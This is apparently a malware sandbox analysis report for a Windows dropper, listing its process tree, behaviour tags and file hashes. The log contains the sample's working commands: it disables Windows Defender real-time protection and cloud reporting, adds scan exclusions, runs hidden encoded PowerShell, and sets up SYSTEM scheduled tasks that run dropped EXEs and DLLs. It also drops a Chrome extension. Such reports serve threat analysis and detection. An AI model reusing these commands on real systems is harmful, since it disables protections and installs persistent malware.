- Suspicious use of WriteProcessMemory
PID:1520 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:820
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1700
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:984 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1948 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1696
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:552
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ghPjAQllJ" /SC once /ST 05:52:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1092
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ghPjAQllJ"4⤵PID:808
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ghPjAQllJ"4⤵PID:564
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bVPnZmTmfBquXJeKIT" /SC once /ST 22:13:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\wAAoYppMDbtShAwYq\GfPyGdpxFACRQsJ\rBalGpw.exe\" vN /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1364
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {737C5EC4-6648-49F9-9210-C1D158982162} S-1-5-21-3385717845-2518323428-350143044-1000:SABDUHNY\Admin:Interactive:[1]1⤵PID:1048
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1352 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1856
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:480 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:296
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1936 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1324
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:284 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1152
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:652
-
C:\Windows\system32\taskeng.exetaskeng.exe {A1B750DF-E6B3-4637-84F8-91CB2C9B5A3B} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1708
-
C:\Users\Admin\AppData\Local\Temp\wAAoYppMDbtShAwYq\GfPyGdpxFACRQsJ\rBalGpw.exeC:\Users\Admin\AppData\Local\Temp\wAAoYppMDbtShAwYq\GfPyGdpxFACRQsJ\rBalGpw.exe vN /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1100 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gIHphlYKc" /SC once /ST 18:59:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1832
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gIHphlYKc"3⤵PID:984
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gIHphlYKc"3⤵PID:748
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1624
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1376
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1856
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1364
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gNjfXRqxA" /SC once /ST 06:02:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1316
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gNjfXRqxA"3⤵PID:1804
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gNjfXRqxA"3⤵PID:1732
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pIYRwKxBaOzqikCb" /t REG_DWORD /d 0 /reg:323⤵PID:1680
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pIYRwKxBaOzqikCb" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1676
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pIYRwKxBaOzqikCb" /t REG_DWORD /d 0 /reg:643⤵PID:1492
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pIYRwKxBaOzqikCb" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:748
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pIYRwKxBaOzqikCb" /t REG_DWORD /d 0 /reg:323⤵PID:532
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pIYRwKxBaOzqikCb" /t REG_DWORD /d 0 /reg:324⤵PID:1712
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pIYRwKxBaOzqikCb" /t REG_DWORD /d 0 /reg:643⤵PID:1640
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pIYRwKxBaOzqikCb" /t REG_DWORD /d 0 /reg:644⤵PID:1524
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\pIYRwKxBaOzqikCb\UMeDIWkB\nGCqrNvDSjsBFKHl.wsf"3⤵PID:1256
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\pIYRwKxBaOzqikCb\UMeDIWkB\nGCqrNvDSjsBFKHl.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1800 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VMeMEPztOsUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VMeMEPztOsUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VpeeuBoLdsfCC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1252
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VpeeuBoLdsfCC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kFdzwgcsqDZevnSgonR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kFdzwgcsqDZevnSgonR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1504
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mMQoIZnNGNdU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1756
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mMQoIZnNGNdU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1888
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mgLqjNPWU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1292
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mgLqjNPWU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\JVfpBtJrTNfNsQVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\JVfpBtJrTNfNsQVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1216
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\wAAoYppMDbtShAwYq" /t REG_DWORD /d 0 /reg:324⤵PID:1524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\wAAoYppMDbtShAwYq" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pIYRwKxBaOzqikCb" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pIYRwKxBaOzqikCb" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VMeMEPztOsUn" /t REG_DWORD /d 0 /reg:324⤵PID:1948
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VMeMEPztOsUn" /t REG_DWORD /d 0 /reg:644⤵PID:1584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VpeeuBoLdsfCC" /t REG_DWORD /d 0 /reg:324⤵PID:936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VpeeuBoLdsfCC" /t REG_DWORD /d 0 /reg:644⤵PID:268
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kFdzwgcsqDZevnSgonR" /t REG_DWORD /d 0 /reg:324⤵PID:1740
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kFdzwgcsqDZevnSgonR" /t REG_DWORD /d 0 /reg:644⤵PID:1148
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mMQoIZnNGNdU2" /t REG_DWORD /d 0 /reg:324⤵PID:1724
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mMQoIZnNGNdU2" /t REG_DWORD /d 0 /reg:644⤵PID:272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mgLqjNPWU" /t REG_DWORD /d 0 /reg:324⤵PID:1656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mgLqjNPWU" /t REG_DWORD /d 0 /reg:644⤵PID:1856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\JVfpBtJrTNfNsQVB" /t REG_DWORD /d 0 /reg:324⤵PID:1640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\JVfpBtJrTNfNsQVB" /t REG_DWORD /d 0 /reg:644⤵PID:1816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\wAAoYppMDbtShAwYq" /t REG_DWORD /d 0 /reg:324⤵PID:1596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\wAAoYppMDbtShAwYq" /t REG_DWORD /d 0 /reg:644⤵PID:1096
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pIYRwKxBaOzqikCb" /t REG_DWORD /d 0 /reg:324⤵PID:808
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pIYRwKxBaOzqikCb" /t REG_DWORD /d 0 /reg:644⤵PID:1884
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gjtmLlGlv" /SC once /ST 10:30:15 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1560
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gjtmLlGlv"3⤵PID:860
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gjtmLlGlv"3⤵PID:1656
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1752
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1640
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1700
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1256
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "CeimXGcICqHikUZiG" /SC once /ST 13:40:44 /RU "SYSTEM" /TR "\"C:\Windows\Temp\pIYRwKxBaOzqikCb\TMXdAXJyTNtvwTc\sartqAJ.exe\" aV /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1876
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "CeimXGcICqHikUZiG"3⤵PID:1816
-
-
-
C:\Windows\Temp\pIYRwKxBaOzqikCb\TMXdAXJyTNtvwTc\sartqAJ.exeC:\Windows\Temp\pIYRwKxBaOzqikCb\TMXdAXJyTNtvwTc\sartqAJ.exe aV /site_id 525403 /S2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:888 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bVPnZmTmfBquXJeKIT"3⤵PID:616
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1812
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:1944
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:468
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:1324
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\mgLqjNPWU\QOQSHo.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "UQjVtDzLrufMISZ" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:860
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UQjVtDzLrufMISZ2" /F /xml "C:\Program Files (x86)\mgLqjNPWU\WpyDkak.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1788
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "UQjVtDzLrufMISZ"3⤵PID:532
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "UQjVtDzLrufMISZ"3⤵PID:668
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xeEdlWwvgDggxE" /F /xml "C:\Program Files (x86)\mMQoIZnNGNdU2\zrZZooG.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:552
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "HbWXyotuKGwUi2" /F /xml "C:\ProgramData\JVfpBtJrTNfNsQVB\NDBxzEL.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1316
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KNgpXyLxjztSEzXEY2" /F /xml "C:\Program Files (x86)\kFdzwgcsqDZevnSgonR\yNTrlzl.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1524
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ldzZDPvmezBaAizzQJS2" /F /xml "C:\Program Files (x86)\VpeeuBoLdsfCC\VIjbMOF.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1596
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rTRcbUUPNNGcKFAGn" /SC once /ST 17:57:24 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\pIYRwKxBaOzqikCb\LcLdqFBp\vukGBGB.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1780
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "rTRcbUUPNNGcKFAGn"3⤵PID:1252
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:748
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:2004
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1504
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1292
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "CeimXGcICqHikUZiG"3⤵PID:1352
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\pIYRwKxBaOzqikCb\LcLdqFBp\vukGBGB.dll",#1 /site_id 5254032⤵PID:1584
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\pIYRwKxBaOzqikCb\LcLdqFBp\vukGBGB.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:936 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "rTRcbUUPNNGcKFAGn"4⤵PID:1376
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1672
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1560
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "3271660261874964597-65004905810881421371210359218-21047391781018264341391667967"1⤵
- Windows security bypass
PID:1524
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1676
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5f715a45653cf70b882fce3a88f007d58
SHA1460f662d45bd72dd07f0a52bae83adbfc07eff59
SHA2569e126eb15b8e738954e8757551a8b24a1853661fdc432dafc562635e48eb11bd
SHA512ac3bff2890a64deee0a43e6ca87af59a54a963f76f0edb326319f675fd860547d258dc0a91dd9841a59b807eb39e34f3a657854f4b6e4139ef7f20a9d104d6e4
-
Filesize
2KB
MD5414c17f6eb67c0819f3bca5808ca92f0
SHA1273d468df9af28ad809627d71a97bb53897c06fa
SHA256f490febbd38cd0b48eb1eb498ba1c81c20783f5bf5f500cfd9d3a74cc87aef73
SHA5127e09c53ec337ff955a978c0bcbd11425c8708610f525805e20851f681bda539d71205a8b5463f59953df8260b5892d2a88928b733040317368ca53b1d004d48e
-
Filesize
2KB
MD54498c1bbe64cc7619f94bf5d6c2510f9
SHA18722685f71b68c2a2a93ce0de7124b2ff66bc871
SHA256e3978dc45fa104c8b25a5866e01f18c94680f1ad735e805886d13cc8d6370fd8
